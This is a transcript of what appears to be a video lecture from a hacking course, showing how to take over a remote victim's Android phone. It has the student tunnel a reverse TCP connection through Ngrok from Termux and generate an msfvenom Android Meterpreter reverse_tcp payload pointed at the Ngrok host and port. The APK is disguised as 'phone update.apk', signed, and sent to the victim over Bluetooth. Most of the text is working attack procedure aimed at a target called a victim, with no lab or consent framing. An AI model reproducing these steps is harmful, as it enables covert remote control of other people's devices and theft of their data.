Hello everyone and welcome to the class. Now, in our previous class, we learned how an attacker can get into the victim's device if they are in the same network. But suppose your victim is sitting somewhere in other country, or simply your victim is not in your network area. Then, how an attacker will get into the device? For that, in this video lecture, we'll learn how we can use Metasploit exploits and generate payloads over the WAN, that is wide area network. So quickly we'll understand what is WAN. So a wide area network, also known as WAN, is a large network of information that is not tied to a single location. WANs can facilitate communication, the sharing of information and much more between devices from around the world through a WAN provider. Best example of WAN can be an internet. Go through the reading materials attached. If you face any problem in understanding the terms, feel free to reach out. So, for over the WAN attack, we'll be using port forwarding and we'll use the platform that is Ngrok. Now let's understand what is port forwarding. In computer networking, port forwarding or port mapping is an application of network address translation, that is NAT, that redirects a communication request from one address and port number combination to another while the packets are traversing a network gateway such as a router or a firewall. Now Ngrok allows you to expose a web server running on your local machine to the internet. Just tell Ngrok what port your web server is listening on. So again a reminder, if you are new to networking, just don't worry and follow the reading materials provided in the course. You will understand the basic functionality. So moving to the practical part now, first open up your browser and type Ngrok and then quickly sign up and you will see the dashboard and you can see the dashboard as in your screen you can see, and then click download for Linux. Once it is downloaded, you will see the files and the folder inside the download directory in your internal storage. Now select the authentication and copy the auth token. This is your auth token, you need to copy it. Now we'll quickly jump back to a Termux. Now type cd/sd card /download. As we know that it has been downloaded in the download folder. Next, we'll quickly move it to our home directory. So for that, simply type mv ngrok *, that means all, and then $home. So it will move the file to our home directory. If you do ls, you'll see the zip file. Now we need to unzip the file. So for that, we'll use the unzip command. So we'll copy the file name, okay, and type unzip and paste the file name. Hit enter and then ls. You'll see ngrok file. Now we'll paste the authentication token which we have copied earlier and hit enter. So now simply type //ngrok. We can use HTTP or reverse TCP and the port number and then hit enter. So before we do that, let me clear you one thing. We can start Ngrok with our own mobile data on, and we can also start Ngrok with our Wi-Fi on. So there are two ways. Okay. So in our first demonstration, I'll show you how to start Ngrok and create the payload with our data on. So when our data is on, make sure you also have turned on your hotspot. A small spoiler, I tried with my data on and most of the time at the end of my payload generation, hotspot gets turned off. Okay, so for using this mobile data on and the hotspot, this is the video. I'll demonstrate you how we can use our mobile data and with the help of hotspot we can create the payload. So now you need to follow the steps as demonstrated in the video lecture. And if you have successfully created the payload and once your victim installs the app and the session is established, then you have done it perfectly. But if you face the hotspot getting off most of the time, as in my case, so in the next video I'll show you how you can do with the help of Wi-Fi as well. So don't be disappointed if you're not able to do the attack with your mobile data and hotspot on. The next method in the next video will definitely work. So if you face any problem in this video with mobile data on, so kindly skip to the next video. So now coming back to the Ngrok, let's begin. So as you can see I have cleared my screen and I'm starting it from the scratch again. And make sure your data and hotspot both are turned on. So type ./ngrok. Now I want to open a port of TCP protocol. So type TCP and random 4-digit number. Remember it, okay? And hit enter. So I have used 4040 as a port number. Make sure your hotspot is turned on. Now you can see your connection will be established. Yeah, now your session status is showing online. Also, as you can see in front of web interface, we have provided a port number as 4040, but once the port forwarding is done, you can see your L host will be TCP //0.tcp.ngrok.io, and your forwarded port number, that is L port, would be 18985. This will be different for different, the port number will vary according every time you try to start on the session, your port number will vary. Okay, so now we need to generate the payload. So we'll go to the Metasploit framework directory. We'll type msfvenom as we did for LAN, but your L host will not be the IP which we used in the LAN, otherwise it will not do the port forwarding. So msfvenom -p android meterpreter reverse underscore TCP, your L host will be the forwarding the L host which we have received while our session turned on. Okay, so once again we'll go to our Ngrok session, we'll copy it from TCP till .io, okay, and we'll paste it, and thereafter L port will be the port which we have which Ngrok has provided us, that is 18985, and then -O for the output, and we'll provide the destination where our APK would be saved. So /SDK, SD card, and our APK name. So let's give it the name as phone update.apk. You can write it you can give it any name, then hit enter. It will take few seconds to generate the payload. So yeah, our payload has been generated, and the rest procedure is same as we did for the LAN in the previous in our earlier videos. Again we'll go to MI Explorer. There we'll find our APK that is named as phone update.apk. We'll click it and we'll sign it with the help of auto. Next we'll send it to our victim via Bluetooth or share it. The procedure is almost same as we did in the LAN, just we are doing here extra is the port forwarding. But mind it, your data should be on and your hotspot should be on. Both of the things should be on. Okay, now we signed it and hit auto. Next we'll send it via Bluetooth.